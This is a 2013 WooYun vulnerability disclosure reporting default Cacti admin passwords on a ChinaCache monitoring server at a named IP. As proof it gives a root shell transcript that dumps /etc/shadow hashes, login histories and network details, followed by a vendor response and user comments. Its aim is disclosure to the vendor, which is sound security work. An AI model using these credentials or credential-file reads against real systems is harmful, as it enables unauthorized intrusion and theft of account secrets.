当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032391

漏洞标题:ChinaCache 监控服务CACTI管理后台弱口令 (可ROOT服务器)

相关厂商:ChinaCache

漏洞作者: 猪猪侠

提交时间:2013-07-26 13:54

修复时间:2013-09-09 13:55

公开时间:2013-09-09 13:55

漏洞类型:服务弱口令

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-26: 细节已通知厂商并且等待厂商处理中
2013-07-26: 厂商已经确认,细节仅向厂商公开
2013-08-05: 细节向核心白帽子及相关领域专家公开
2013-08-15: 细节向普通白帽子公开
2013-08-25: 细节向实习白帽子公开
2013-09-09: 细节向公众公开

简要描述:

该服务器所处机房很高端,网易、搜狐、新浪、360、百度等等大厂商都有服务器在。
如果被间接利用,危害是非常大的。

详细说明:

CACTI 地址:
http://220.181.47.151/
弱口令
admin:admin
guest:admin

chinacache_cacti.jpg

漏洞证明:

sh-3.2# /sbin/ifconfig -a
/sbin/ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:13:72:65:28:5C  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
eth1      Link encap:Ethernet  HWaddr 00:13:72:65:28:5D  
          inet addr:220.181.47.151  Bcast:220.181.47.159  Mask:255.255.255.240
          inet6 addr: fe80::213:72ff:fe65:285d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:71655106 errors:0 dropped:0 overruns:0 frame:0
          TX packets:28384460 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:10572923065 (9.8 GiB)  TX bytes:4031517289 (3.7 GiB)
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1020776 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1020776 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:108876144 (103.8 MiB)  TX bytes:108876144 (103.8 MiB)
peth1     Link encap:Ethernet  HWaddr FE:FF:FF:FF:FF:FF  
          inet6 addr: fe80::fcff:ffff:feff:ffff/64 Scope:Link
          UP BROADCAST RUNNING NOARP  MTU:1500  Metric:1
          RX packets:100902104 errors:0 dropped:0 overruns:0 frame:0
          TX packets:34752238 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:13784303050 (12.8 GiB)  TX bytes:4762685018 (4.4 GiB)
sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
veth0     Link encap:Ethernet  HWaddr 00:00:00:00:00:00  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
veth2     Link encap:Ethernet  HWaddr 00:00:00:00:00:00  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
veth3     Link encap:Ethernet  HWaddr 00:00:00:00:00:00  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
veth4     Link encap:Ethernet  HWaddr 00:00:00:00:00:00  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
vif0.0    Link encap:Ethernet  HWaddr FE:FF:FF:FF:FF:FF  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
vif0.1    Link encap:Ethernet  HWaddr FE:FF:FF:FF:FF:FF  
          inet6 addr: fe80::fcff:ffff:feff:ffff/64 Scope:Link
          UP BROADCAST RUNNING NOARP  MTU:1500  Metric:1
          RX packets:36967271 errors:0 dropped:0 overruns:0 frame:0
          TX packets:86224028 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:4855610108 (4.5 GiB)  TX bytes:12810458166 (11.9 GiB)
vif0.2    Link encap:Ethernet  HWaddr FE:FF:FF:FF:FF:FF  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
vif0.3    Link encap:Ethernet  HWaddr FE:FF:FF:FF:FF:FF  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
vif0.4    Link encap:Ethernet  HWaddr FE:FF:FF:FF:FF:FF  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
virbr0    Link encap:Ethernet  HWaddr 00:00:00:00:00:00  
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          inet6 addr: fe80::200:ff:fe00:0/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:70 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:14808 (14.4 KiB)
xenbr1    Link encap:Ethernet  HWaddr FE:FF:FF:FF:FF:FF  
          UP BROADCAST RUNNING NOARP  MTU:1500  Metric:1
          RX packets:54265731 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:7918369069 (7.3 GiB)  TX bytes:0 (0.0 b)
sh-3.2# cat /etc/shadow
cat /etc/shadow
root:$1$x8z81Z1H$tTHI****egXf4AYimjO5U.:15519:0:99999:7:::
bin:*:14999:0:99999:7:::
daemon:*:14999:0:99999:7:::
adm:*:14999:0:99999:7:::
lp:*:14999:0:99999:7:::
sync:*:14999:0:99999:7:::
shutdown:*:14999:0:99999:7:::
halt:*:14999:0:99999:7:::
mail:*:14999:0:99999:7:::
news:*:14999:0:99999:7:::
uucp:*:14999:0:99999:7:::
operator:*:14999:0:99999:7:::
games:*:14999:0:99999:7:::
gopher:*:14999:0:99999:7:::
ftp:*:14999:0:99999:7:::
nobody:*:14999:0:99999:7:::
nscd:!!:14999:0:99999:7:::
distcache:!!:14999:0:99999:7:::
vcsa:!!:14999:0:99999:7:::
ais:!!:14999:0:99999:7:::
pcap:!!:14999:0:99999:7:::
ntp:!!:14999:0:99999:7:::
squid:!!:14999:0:99999:7:::
apache:!!:14999:0:99999:7:::
rpc:!!:14999:0:99999:7:::
named:!!:14999:0:99999:7:::
mailnull:!!:14999:0:99999:7:::
smmsp:!!:14999:0:99999:7:::
rpcuser:!!:14999:0:99999:7:::
nfsnobody:!!:14999:0:99999:7:::
sshd:!!:14999:0:99999:7:::
webalizer:!!:14999:0:99999:7:::
luci:!!:14999:0:99999:7:::
dbus:!!:14999:0:99999:7:::
avahi:!!:14999:0:99999:7:::
xfs:!!:14999:0:99999:7:::
hsqldb:!!:14999:0:99999:7:::
ricci:!!:14999:0:99999:7:::
haldaemon:!!:14999:0:99999:7:::
avahi-autoipd:!!:14999:0:99999:7:::
pegasus:!!:14999:0:99999:7:::
gdm:!!:14999:0:99999:7:::
sabayon:!!:14999:0:99999:7:::
mysql:!!:15001::::::
admin:$1$.XZjnzjb$b/******Dlcg/wrPWMA1l2.:15023:0:99999:7:::
sh-3.2# cat /etc/hosts
cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1               localhost.localdomain localhost
::1             localhost6.localdomain6 localhost6
sh-3.2# uname -a
uname -a
Linux localhost.localdomain 2.6.18-194.el5xen #1 SMP Fri Apr 2 15:34:40 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# last -20
last -20
admin    pts/1        61.135.207.195   Thu Jul 25 15:35 - 15:37  (00:01)    
admin    pts/1        61.135.207.195   Thu Jul 11 16:12 - 16:46  (00:33)    
admin    pts/1        220.181.64.20    Tue Jun 18 10:15 - 11:51  (01:35)    
admin    pts/1        220.181.64.20    Sun Jun 16 23:18 - 23:30  (00:11)    
admin    pts/1        220.181.64.20    Sat Jun  8 11:36 - 11:40  (00:04)    
admin    pts/1        220.181.64.19    Fri Jun  7 17:15 - 18:08  (00:52)    
admin    pts/1        220.181.64.20    Mon May 27 11:11 - 13:32  (02:21)    
admin    pts/1        220.181.64.21    Fri May 24 13:39 - 14:06  (00:27)    
admin    pts/1        220.181.64.21    Tue May 21 10:09 - 14:33  (04:23)    
admin    pts/1        220.181.64.21    Sat May 18 02:39 - 03:10  (00:30)    
admin    pts/1        220.181.64.21    Tue May  7 10:48 - 13:00  (02:11)    
admin    pts/1        220.181.64.20    Wed Apr 17 17:45 - 17:52  (00:06)    
admin    pts/1        220.181.64.20    Wed Apr 10 15:07 - 18:07  (03:00)    
root     pts/1        113.31.38.21     Wed Mar 13 12:00 - 12:00  (00:00)    
admin    pts/1        111.196.233.62   Sat Mar  9 13:31 - 13:32  (00:00)    
admin    pts/1        220.181.64.20    Tue Feb 26 15:57 - 18:05  (02:07)    
admin    pts/1        220.181.64.20    Tue Feb 26 12:06 - 15:55  (03:49)    
admin    pts/1        220.181.64.20    Tue Feb 26 10:33 - 10:49  (00:15)    
admin    pts/1        220.181.64.21    Thu Jan 24 11:52 - 18:01  (06:08)    
admin    pts/2        220.181.64.21    Mon Jan 21 17:32 - 18:08  (00:36)    
wtmp begins Wed Jan 26 03:37:41 2011
sh-3.2# ping hd.360.cn -c 2
ping hd.360.cn -c 2
PING hd-b.360.cn (220.181.47.91) 56(84) bytes of data.
64 bytes from 220.181.47.91: icmp_seq=1 ttl=62 time=0.638 ms
64 bytes from 220.181.47.91: icmp_seq=2 ttl=62 time=0.619 ms
--- hd-b.360.cn ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 5001ms
rtt min/avg/max/mdev = 0.619/0.628/0.638/0.026 ms
sh-3.2#

修复方案:

#1 CACTI 管理地址做严格的访问控制规则
#2 杜绝默认口令。

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-07-26 17:18

厂商回复:

感谢 @猪猪侠 提报的安全漏洞。
由于该设备不属于重要系统,不会对蓝汛造成重大安全影响,因此根据乌云 Rand 评级制度给予“低”的评价,但给予“低”的最高分值 5 分表示感谢。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-07-26 14:01 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    。。。。。。。。。。

  2. 2013-07-26 14:02 | dyun ( 普通白帽子 | Rank:102 漏洞数:15 | [code][/code])

    你知道的太多了...

  3. 2013-07-26 14:09 | 天朝城管 ( 普通白帽子 | Rank:116 漏洞数:35 | 不要等到命玩你的时候才开始玩命)

    开门 顺丰快递!

  4. 2013-07-26 14:29 | circus ( 实习白帽子 | Rank:54 漏洞数:4 | 你会为一件事去说一句话,也会为一句话去干...)

    mark!

  5. 2013-07-26 14:54 | B1acken ( 普通白帽子 | Rank:174 漏洞数:56 | 渣渣)

    洞主你知道得太多了

  6. 2013-07-26 15:33 | j0ck ( 实习白帽子 | Rank:45 漏洞数:5 | hello~)

    Cacti弱口令脚本处命令执行么

  7. 2013-07-26 16:22 | winsyk ( 普通白帽子 | Rank:108 漏洞数:16 | 越长大越孤单)

    小哥,你搞的太深入了:)

  8. 2013-07-26 22:39 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    ChinaCache出问题的设备都不属于重要系统的,建议以后直接关闭走人,别发乌云。

  9. 2013-08-26 12:25 | Leon ( 路人 | Rank:25 漏洞数:6 | 永无宁日啊)

    这个我记得最少半年前就有了。

  10. 2013-09-09 21:19 | hack2012 ( 实习白帽子 | Rank:31 漏洞数:3 | 关注信息安全 http://www.waitalone.cn/)

    直接root的地方是哪?